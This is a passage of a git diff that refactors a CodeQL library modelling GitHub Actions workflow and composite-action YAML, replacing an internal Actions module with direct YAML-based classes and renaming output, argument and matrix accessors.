job or step. */ +abstract class Env extends AstNode instanceof YamlMapping { } + +/** A workflow level `env` mapping. */ +class WorkflowEnv extends Env { + Workflow workflow; + + WorkflowEnv() { workflow.(YamlMapping).lookup("env") = this } + + /** Gets the workflow this field belongs to. */ + Workflow getWorkflow() { result = workflow } +} + +/** A job level `env` mapping. */ +class JobEnv extends Env { + Job job; + + JobEnv() { job.(YamlMapping).lookup("env") = this } + + /** Gets the job this field belongs to. */ + Job getJob() { result = job } +} + +/** A step level `env` mapping. */ +class StepEnv extends Env { + Step step; + + StepEnv() { step.(YamlMapping).lookup("env") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } +} + /** - * A composite action + * A custom composite action. This is a mapping at the top level of an Actions YAML action file. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. */ -class CompositeAction extends AstNode instanceof Actions::CompositeAction { - Runs getRuns() { result = super.getRuns() } +class CompositeAction extends AstNode instanceof YamlDocument, YamlMapping { + //class CompositeAction extends AstNode, YamlDocument, YamlMapping { + CompositeAction() { + this.getFile().getBaseName() = ["action.yml", "action.yaml"] and + super.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" + } - Outputs getOutputs() { result = this.(YamlMapping).lookup("outputs") } + /** Gets the `runs` mapping. */ + Runs getRuns() { result = super.lookup("runs") } - Expression getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + Outputs getOutputs() { result = super.lookup("outputs") } - Expression getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } - Input getAnInput() { this.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } + StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } + + Input getAnInput() { super.lookup("inputs").(YamlMapping).maps(result, _) } Input getInput(string name) { - this.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) and + super.lookup("inputs").(YamlMapping).maps(result, _) and result.(YamlString).getValue() = name } } -class Runs extends AstNode instanceof Actions::Runs { - Step getAStep() { result = super.getSteps().getElementNode(_) } +/** + * An `runs` mapping in a custom composite action YAML. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs + */ +class Runs extends AstNode instanceof YamlMapping { + CompositeAction action; + + Runs() { action.(YamlMapping).lookup("runs") = this } + + /** Gets the action that this `runs` mapping is in. */ + CompositeAction getAction() { result = action } - Step getStep(int i) { result = super.getSteps().getElementNode(i) } + /** Gets any steps that are defined within this job. */ + Step getAStep() { result = super.lookup("steps").(YamlSequence).getElementNode(_) } + + /** Gets the step at the given index within this job. */ + Step getStep(int i) { result = super.lookup("steps").(YamlSequence).getElementNode(i) } } /** - * A Github Actions Workflow + * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. */ -class Workflow extends AstNode instanceof Actions::Workflow { - string getName() { result = super.getName() } +class Workflow extends AstNode instanceof YamlDocument, YamlMapping { + /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ + YamlMapping getJobs() { result = super.lookup("jobs") } + + /** Gets the 'global' `env` mapping in this workflow. */ + WorkflowEnv getEnv() { result = super.lookup("env") } + + /** Gets the name of the workflow. */ + string getName() { result = super.lookup("name").(YamlString).getValue() } - Job getAJob() { result = super.getJob(_) } + /** Gets the job within this workflow with the given job ID. */ + Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } - Job getJob(string id) { result = super.getJob(id) } + /** Gets a job within this workflow */ + Job getAJob() { result = this.getJob(_) } predicate hasTriggerEvent(string trigger) { - exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) + exists(YamlNode n | n = super.lookup("on").(YamlMappingLikeNode).getNode(trigger)) } string getATriggerEvent() { - exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) + exists(YamlNode n | n = super.lookup("on").(YamlMappingLikeNode).getNode(result)) } - Permissions getPermissions() { result = this.(YamlMapping).lookup("permissions") } + Permissions getPermissions() { result = super.lookup("permissions") } - Strategy getStrategy() { result = this.(YamlMapping).lookup("strategy") } + Strategy getStrategy() { result = super.lookup("strategy") } } -class ReusableWorkflow extends Workflow { +class ReusableWorkflow extends Workflow instanceof YamlMapping { YamlValue workflow_call; - ReusableWorkflow() { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } + ReusableWorkflow() { + super.lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call + } Outputs getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } - Expression getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } - Expression getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } Input getAnInput() { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } @@ -118,20 +182,22 @@ class Outputs extends AstNode instanceof YamlMapping { /** * Gets an output expression. */ - Expression getAnOutputExpr() { - this.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = result or - this.(YamlMapping).lookup(_) = result + StringLiteral getAnOutput() { + super.lookup(_).(YamlMapping).lookup("value") = result or + super.lookup(_) = result } /** * Gets a specific output expression by name. */ - Expression getOutputExpr(string name) { - this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result or - this.(YamlMapping).lookup(name) = result + StringLiteral getOutput(string name) { + super.lookup(name).(YamlMapping).lookup("value") = result or + super.lookup(name) = result } string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } + + override string toString() { result = "Job outputs node" } } class Permissions extends AstNode instanceof YamlMapping { @@ -148,8 +214,8 @@ class Strategy extends AstNode instanceof YamlMapping { /** * Gets a specific matric expression (YamlMapping) by name. */ - Expression getMatrixVariableExpr(string name) { - this.(YamlMapping).lookup("matrix").(YamlMapping).lookup(name) = result + StringLiteral getMatrixVariable(string name) { + super.lookup("matrix").(YamlMapping).lookup(name) = result } string getAMatrixVariableName() { @@ -158,28 +224,61 @@ class Strategy extends AstNode instanceof YamlMapping { } /** - * A Job is a collection of steps that run in an execution environment. + * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ -class Job extends AstNode instanceof Actions::Job { +class Needs extends AstNode { + Job job; + + Needs() { job.(YamlMapping).lookup("needs") = this } + + Job getJob() { result = job } + + Job getANeededJob() { + if this instanceof YamlString + then + result.getId() = this.(YamlString).getValue() and + result.getLocation().getFile() = job.getLocation().getFile() + else + if this instanceof YamlSequence + then + result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and + result.getLocation().getFile() = job.getLocation().getFile() + else none() + } +} + +/** + * An Actions job within a workflow. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. + */ +class Job extends AstNode instanceof YamlMapping { + string jobId; + Workflow workflow; + + Job() { this = workflow.getJobs().lookup(jobId) } + /** * Gets the ID of this job, as a string. * This is the job's key within the `jobs` mapping. */ - string getId() { result = super.getId() } + string getId() { result = jobId } + + /** Gets any steps that are defined within this job. */ + Step getAStep() { result = super.lookup("steps").(YamlSequence).getElementNode(_) } /** Gets the step at the given index within this job. */ - Step getStep(int index) { result = super.getStep(index) } + Step getStep(int i) { result = super.lookup("steps").(YamlSequence).getElementNode(i) } - /** Gets any steps that are defined within this job. */ - Step getAStep() { result = super.getStep(_) } + /** Gets the workflow this job belongs to. */ + Workflow getWorkflow() { result = workflow } /** * Gets a needed job. * eg: * - needs: [job1, job2] */ - Job getNeededJob() { - exists(Actions::Needs needs | + Job getANeededJob() { + exists(Needs needs | needs.getJob() = this and result = needs.getANeededJob() ) @@ -191,7 +290,11 @@ class Job extends AstNode instanceof Actions::Job { * out1: ${steps.foo.bar} * out2: ${steps.foo.baz} */ - Outputs getOutputs() { result = this.(Actions::Job).lookup("outputs") } + Outputs getOutputs() { result = super.lookup("outputs") } + + StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } + + StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } /** * Reusable workflow jobs may have Uses children @@ -201,28 +304,38 @@ class Job extends AstNode instanceof Actions::Job { * with: * arg1: value1 */ - JobUses getUses() { result.getJob() = this } + UsesJob getUses() { result.getJob() = this } predicate usesReusableWorkflow() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) } - If getIf() { result = super.getIf() } + If getIf() { result = super.lookup("if") } + + Permissions getPermissions() { result = super.lookup("permissions") } - Permissions getPermissions() { result = this.(YamlMapping).lookup("permissions") } + Strategy getStrategy() { result = super.lookup("strategy") } - Strategy getStrategy() { result = this.(YamlMapping).lookup("strategy") } + override string toString() { result = "Job: " + jobId } } /** - * A Step is a single task that can be executed as part of a job. + * A step within an Actions job. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. */ -class Step extends AstNode instanceof Actions::Step { - string getId() { result = super.getId() } +class Step extends AstNode instanceof YamlMapping { + YamlMapping parent; + + Step() { parent.lookup("steps").(YamlSequence).getElementNode(_) = this } + + /** Gets the ID of this step, if any. */ + string getId() { result = super.lookup("id").(YamlString).getValue() } - Job getJob() { result = super.getJob() } + /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ + Job getJob() { result = parent } - If getIf() { result = super.getIf() } + /** Gets the value of the `if` field in this step, if any. */ + If getIf() { result = super.lookup("if") } } /** @@ -232,7 +345,7 @@ class If extends AstNode { YamlMapping parent; If() { - (parent instanceof Actions::Step or parent instanceof Actions::Job) and + (parent instanceof Step or parent instanceof Job) and parent.lookup("if") = this } @@ -249,39 +362,54 @@ abstract class Uses extends AstNode { abstract string getVersion(); - abstract Expression getArgumentExpr(string key); + abstract StringLiteral getArgument(string key); + + override string toString() { result = "Uses Step" } } +/** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * The capture groups are: + * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` + * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. + * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. + */ +private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } + /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class StepUses extends Step, Uses { - Actions::Uses uses; +class UsesStep extends Step, Uses { + YamlScalar uses; + + UsesStep() { this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = "uses"), uses) } - StepUses() { uses.getStep() = this } + /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ + override string getCallee() { + result = + ( + uses.getValue().regexpCapture(usesParser(), 1) + "/" + + uses.getValue().regexpCapture(usesParser(), 2) + ).toLowerCase() + } - override string getCallee() { result = uses.getGitHubRepository() } + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { result = uses.getValue().regexpCapture(usesParser(), 3) } - override string getVersion() { - result = uses.getVersion() - or - not exists(uses.getVersion()) and - result = "main" + override StringLiteral getArgument(string key) { + result = this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) } - override Expression getArgumentExpr(string key) { - exists(Actions::With with | - with.getStep() = this and - result = with.lookup(key) - ) + override string toString() { + if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" } } /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class JobUses extends Uses instanceof YamlMapping { - JobUses() { this instanceof Job and this.maps(any(YamlString s | s.getValue() = "uses"), _) } +class UsesJob extends Uses instanceof YamlMapping { + UsesJob() { this instanceof Job and this.maps(any(YamlString s | s.getValue() = "uses"), _) } Job getJob() { result = this } @@ -297,7 +425,7 @@ class JobUses extends Uses instanceof YamlMapping { override string getCallee() { exists(YamlString name | - this.(YamlMapping).lookup("uses") = name and + super.lookup("uses") = name and if name.getValue().matches("./%") then result = name.getValue().regexpCapture(this.pathUsesParser(), 1) else @@ -311,72 +439,73 @@ class JobUses extends Uses instanceof YamlMapping { /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | - this.(YamlMapping).lookup("uses") = name and + super.lookup("uses") = name and if not name.getValue().matches("\\.%") then result = name.getValue().regexpCapture(this.repoUsesParser(), 4) else none() ) } - override Expression getArgumentExpr(string key) { - this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result + override StringLiteral getArgument(string key) { + super.lookup("with").(YamlMapping).lookup(key) = result } } /** - * A Run step represents the evaluation of a provided script + * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. */ class Run extends Step { - Actions::Run scriptExpr; - - Run() { scriptExpr.getStep() = this } - - Expression getScriptExpr() { result = scriptExpr } - - string getScript() { result = scriptExpr.getValue() } -} - -// /** -// * An AST node associated with a Reusable Workflow input. -// */ -// class InputExpr extends AstNode { -// InputExpr() { exists(Inputs inputs | inputs.(YamlMapping).maps(this, _)) } -// } -// -// /** -// * An AST node holding an Env var value. -// */ -// class EnvExpr extends AstNode { -// EnvExpr() { exists(Actions::Env env | env.(YamlMapping).lookup(_) = this) } -// } -// -// /** -// * An AST node holding a job or workflow output var. -// */ -// class OutputExpr extends AstNode { -// OutputExpr() { -// exists(Outputs outputs | -// outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or -// outputs.(YamlMapping).lookup(_) = this -// ) -// } -// } -// -// /** -// * An AST node holding a matrix var. -// */ -// class MatrixVariableExpr extends AstNode { -// MatrixVariableExpr() { -// exists(Strategy outputs | outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this) -// } -// } + StringLiteral script; + + Run() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "run"), script) } + + StringLiteral getScript() { result = script } + + override string toString() { + if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" + } +} + +/** + * A YamlString part of a YamlSequence or YamlMapping values. + */ +class StringLiteral extends AstNode instanceof YamlString { + StringLiteral() { + exists(YamlCollection c | + c instanceof YamlMapping and + c.(YamlMapping).maps(_, this) + or + c instanceof YamlSequence and + c.(YamlSequence).getElementNode(_) = this + ) + } + + string getValue() { result = this.(YamlString).getValue() } +} + +/** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. + * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ +string getASimpleReferenceExpression(YamlString node) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + node.getValue() + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, _) + .regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) +} + /** - * Evaluation of a workflow expression ${{}}. + * A StringLiteral containing a workflow expression ${{}}. */ -class Expression extends AstNode instanceof YamlString { +class Expression extends StringLiteral { string expr; - Expression() { expr = Actions::getASimpleReferenceExpression(this) } + Expression() { expr = getASimpleReferenceExpression(this) } string getExpression() { result = expr } @@ -384,7 +513,7 @@ class Expression extends AstNode instanceof YamlString { } /** - * A ${{}} expression accessing a context variable. + * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ class ContextExpression extends Expression { @@ -549,7 +678,7 @@ class EnvExpression extends ContextExpression { override AstNode getTarget() { exists(AstNode s | - s.getEnvExpr(fieldName) = result and + s.getEnvVar(fieldName) = result and s.getAChildNode*() = this ) } @@ -572,12 +701,12 @@ class MatrixExpression extends ContextExpression { override AstNode getTarget() { exists(Workflow w | - w.getStrategy().getMatrixVariableExpr(fieldName) = result and + w.getStrategy().getMatrixVariable(fieldName) = result and w.getAChildNode*() = this ) or exists(Job j | - j.getStrategy().getMatrixVariableExpr(fieldName) = result and + j.getStrategy().getMatrixVariable(fieldName) = result and j.getAChildNode*() = this ) } diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll deleted file mode 100644 index fe10441fd67a..000000000000 --- a/ql/lib/codeql/actions/ast/internal/Actions.qll +++ /dev/null @@ -1,398 +0,0 @@ -/** - * Libraries for modeling GitHub Actions workflow files written in YAML. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. - */ - -import codeql.actions.ast.internal.Yaml -import codeql.files.FileSystem - -/** - * Libraries for modeling GitHub Actions workflow files written in YAML. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. - */ -module Actions { - /** A YAML node in a GitHub Actions workflow or a custom composite action file. */ - private class Node extends YamlNode { - Node() { - exists(File f | - f = this.getLocation().getFile() and - ( - f.getRelativePath().regexpMatch("(^|.*/)\\.github/workflows/.*\\.ya?ml$") or - f.getBaseName() = ["action.yml", "action.yaml"] - ) - ) - } - } - - /** - * A custom composite action. This is a mapping at the top level of an Actions YAML action file. - * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. - */ - class CompositeAction extends Node, YamlDocument, YamlMapping { - CompositeAction() { - this.getFile().getBaseName() = ["action.yml", "action.yaml"] and - this.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" - } - - /** Gets the `runs` mapping. */ - Runs getRuns() { result = this.lookup("runs") } - } - - /** - * An `runs` mapping in a custom composite action YAML. - * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs - */ - class Runs extends StepsContainer { - CompositeAction action; - - Runs() { action.lookup("runs") = this } - - /** Gets the action that this `runs` mapping is in. */ - CompositeAction getAction() { result = action } - - /** Gets the `using` mapping. */ - Using getUsing() { result = this.lookup("using") } - } - - /** - * The parent class of the class that can contain `steps` mappings. (`Job` or `Runs` currently.) - */ - abstract class StepsContainer extends YamlNode, YamlMapping { - /** Gets the sequence of `steps` within this YAML node. */ - YamlSequence getSteps() { result = this.lookup("steps") } - } - - /** - * A `using` mapping in a custom composite action YAML. - */ - class Using extends YamlNode, YamlScalar { - Runs runs; - - Using() { runs.lookup("using") = this } - - /** Gets the `runs` mapping that this `using` mapping is in. */ - Runs getRuns() { result = runs } - } - - /** - * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. - */ - class Workflow extends Node, YamlDocument, YamlMapping { - /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ - YamlMapping getJobs() { result = this.lookup("jobs") } - - /** Gets the 'global' `env` mapping in this workflow. */ - WorkflowEnv getEnv() { result = this.lookup("env") } - - /** Gets the name of the workflow. */ - string getName() { result = this.lookup("name").(YamlString).getValue() } - - /** Gets the name of the workflow file. */ - string getFileName() { result = this.getFile().getBaseName() } - - /** Gets the `on:` in this workflow. */ - On getOn() { result = this.lookup("on") } - - /** Gets the job within this workflow with the given job ID. */ - Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } - } - - /** - * An Actions On trigger within a workflow. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#on. - */ - class On extends YamlNode, YamlMappingLikeNode { - Workflow workflow; - - On() { workflow.lookup("on") = this } - - /** Gets the workflow that this trigger is in. */ - Workflow getWorkflow() { result = workflow } - } - - /** A common class for `env` in workflow, job or step. */ - abstract class Env extends YamlNode, YamlMapping { } - - /** A workflow level `env` mapping. */ - class WorkflowEnv extends Env { - Workflow workflow; - - WorkflowEnv() { workflow.lookup("env") = this } - - /** Gets the workflow this field belongs to. */ - Workflow getWorkflow() { result = workflow } - } - - /** A job level `env` mapping. */ - class JobEnv extends Env { - Job job; - - JobEnv() { job.lookup("env") = this } - - /** Gets the job this field belongs to. */ - Job getJob() { result = job } - } - - /** A step level `env` mapping. */ - class StepEnv extends Env { - Step step; - - StepEnv() { step.lookup("env") = this } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } - } - - /** - * An Actions job within a workflow. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. - */ - class Job extends StepsContainer { - string jobId; - Workflow workflow; - - Job() { this = workflow.getJobs().lookup(jobId) } - - /** - * Gets the ID of this job, as a string. - * This is the job's key within the `jobs` mapping. - */ - string getId() { result = jobId } - - /** - * Gets the ID of this job, as a YAML scalar node. - * This is the job's key within the `jobs` mapping. - */ - YamlString getIdNode() { workflow.getJobs().maps(result, this) } - - /** Gets the human-readable name of this job, if any, as a string. */ - string getName() { result = this.getNameNode().getValue() } - - /** Gets the human-readable name of this job, if any, as a YAML scalar node. */ - YamlString getNameNode() { result = this.lookup("name") } - - /** Gets the step at the given index within this job. */ - Step getStep(int index) { result.getJob() = this and result.getIndex() = index } - - /** Gets the `env` mapping in this job. */ - JobEnv getEnv() { result = this.lookup("env") } - - /** Gets the workflow this job belongs to. */ - Workflow getWorkflow() { result = workflow } - - /** Gets the value of the `if` field in this job, if any. */ - JobIf getIf() { result.getJob() = this } - - /** Gets the value of the `runs-on` field in this job. */ - JobRunson getRunsOn() { result.getJob() = this } - } - - /** - * An `if` within a job. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idif. - */ - class JobIf extends YamlNode, YamlScalar { - Job job; - - JobIf() { job.lookup("if") = this } - - /** Gets the step this field belongs to. */ - Job getJob() { result = job } - } - - /** - * A `runs-on` within a job. - * See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idruns-on. - */ - class JobRunson extends YamlNode, YamlScalar { - Job job; - - JobRunson() { job.lookup("runs-on") = this } - - /** Gets the step this field belongs to. */ - Job getJob() { result = job } - } - - /** - * A step within an Actions job. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. - */ - class Step extends YamlNode, YamlMapping { - int index; - StepsContainer parent; - - Step() { this = parent.getSteps().getElement(index) } - - /** Gets the 0-based position of this step within the sequence of `steps`. */ - int getIndex() { result = index } - - /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ - Job getJob() { result = parent } - - /** Gets the `runs` this step belongs to, if the step belongs to a `runs` in a custom composite action. Has no result if the step belongs to a `job` in a workflow. */ - Runs getRuns() { result = parent } - - /** Gets the value of the `uses` field in this step, if any. */ - Uses getUses() { result.getStep() = this } - - /** Gets the value of the `run` field in this step, if any. */ - Run getRun() { result.getStep() = this } - - /** Gets the value of the `if` field in this step, if any. */ - StepIf getIf() { result.getStep() = this } - - /** Gets the value of the `env` field in this step, if any. */ - StepEnv getEnv() { result = this.lookup("env") } - - /** Gets the ID of this step, if any. */ - string getId() { result = this.lookup("id").(YamlString).getValue() } - } - - /** - * An `if` within a step. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsif. - */ - class StepIf extends YamlNode, YamlScalar { - Step step; - - StepIf() { step.lookup("if") = this } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } - } - - /** - * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. - * The capture groups are: - * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` - * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. - * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. - */ - private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } - - /** - * A `uses` field within an Actions job step, which references an action as a reusable unit of code. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsuses. - * - * For example: - * ``` - * uses: actions/checkout@v2 - * ``` - * - * Does not handle local repository references, e.g. `.github/actions/action-name`. - */ - class Uses extends YamlNode, YamlScalar { - Step step; - - Uses() { step.lookup("uses") = this } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } - - /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ - string getGitHubRepository() { - result = - ( - this.getValue().regexpCapture(usesParser(), 1) + "/" + - this.getValue().regexpCapture(usesParser(), 2) - ).toLowerCase() - } - - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - string getVersion() { result = this.getValue().regexpCapture(usesParser(), 3) } - } - - /** - * A `with` field within an Actions job step, which references an action as a reusable unit of code. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepswith. - * - * For example: - * ``` - * with: - * arg1: 1 - * arg2: abc - * ``` - */ - class With extends YamlNode, YamlMapping { - Step step; - - With() { step.lookup("with") = this } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } - } - - /** - * A `ref:` field within an Actions `with:` specific to `actions/checkout` action. - * - * For example: - * ``` - * uses: actions/checkout@v2 - * with: - * ref: ${{ github.event.pull_request.head.sha }} - * ``` - */ - class Ref extends YamlNode, YamlString { - With with; - - Ref() { with.lookup("ref") = this } - - /** Gets the `with` field this field belongs to. */ - With getWith() { result = with } - } - - /** - * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. - * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. - * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. - * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} - */ - string getASimpleReferenceExpression(YamlString node) { - // We use `regexpFind` to obtain *all* matches of `${{...}}`, - // not just the last (greedy match) or first (reluctant match). - result = - node.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, _) - .regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) - } - - /** Extracts the 'name' part from env.name */ - bindingset[name] - string getEnvName(string name) { result = name.regexpCapture("env\\.([A-Za-z0-9_]+)", 1) } - - /** - * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. - * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. - */ - class Run extends YamlNode, YamlString { - Step step; - - Run() { step.lookup("run") = this } - - /** Gets the step that executes this `run` command. */ - Step getStep() { result = step } - } - - /** - * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds - */ - class Needs extends YamlNode { - Job job; - - Needs() { job.lookup("needs") = this } - - Job getJob() { result = job } - - Job getANeededJob() { - if this instanceof YamlString - then result.getId() = this.(YamlString).getValue() and result.getFile() = job.getFile() - else - if this instanceof YamlSequence - then - result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and - result.getFile() = job.getFile() - else none() - } - } -} diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 661544dfed25..d64c91f7bb77 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -77,7 +77,6 @@ module Completion { class ReturnSuccessor extends SuccessorType, TReturnSuccessor { override string toString() { result = "return" } } - // Why is there no conditional successor type? } module CfgScope { @@ -149,7 +148,7 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos rank[i](AstNode child, Location l | ( child = this.(CompositeAction).getAnInput() or - child = this.(CompositeAction).getAnOutputExpr() or + child = this.(CompositeAction).getAnOutput() or child = this.(CompositeAction).getRuns() ) and l = child.getLocation() @@ -172,10 +171,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { result = rank[i](AstNode child, Location l | ( - child = this.(ReusableWorkflow).getAJob() or child = this.(ReusableWorkflow).getAnInput() or - child = this.(ReusableWorkflow).getAnOutputExpr() or - child = this.(ReusableWorkflow).getStrategy() + child = this.(ReusableWorkflow).getAnOutput() or + child = this.(ReusableWorkflow).getStrategy() or + child = this.(ReusableWorkflow).getAJob() ) and l = child.getLocation() | @@ -203,7 +202,7 @@ private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getOutputExpr(_) and l = child.getLocation() + child = super.getOutput(_) and l = child.getLocation() | child order by @@ -216,7 +215,7 @@ private class StrategyTree extends StandardPreOrderTree instanceof Strategy { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getMatrixVariableExpr(_) and l = child.getLocation() + child = super.getMatrixVariable(_) and l = child.getLocation() | child order by @@ -248,7 +247,7 @@ private class UsesTree extends StandardPreOrderTree instanceof Uses { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and + (child = super.getArgument(_) or child = super.getEnvVar(_)) and l = child.getLocation() | child @@ -262,7 +261,7 @@ private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getEnvExpr(_) or child = super.getScriptExpr()) and + (child = super.getEnvVar(_) or child = super.getScript()) and l = child.getLocation() | child @@ -276,11 +275,4 @@ private class UsesLeaf extends 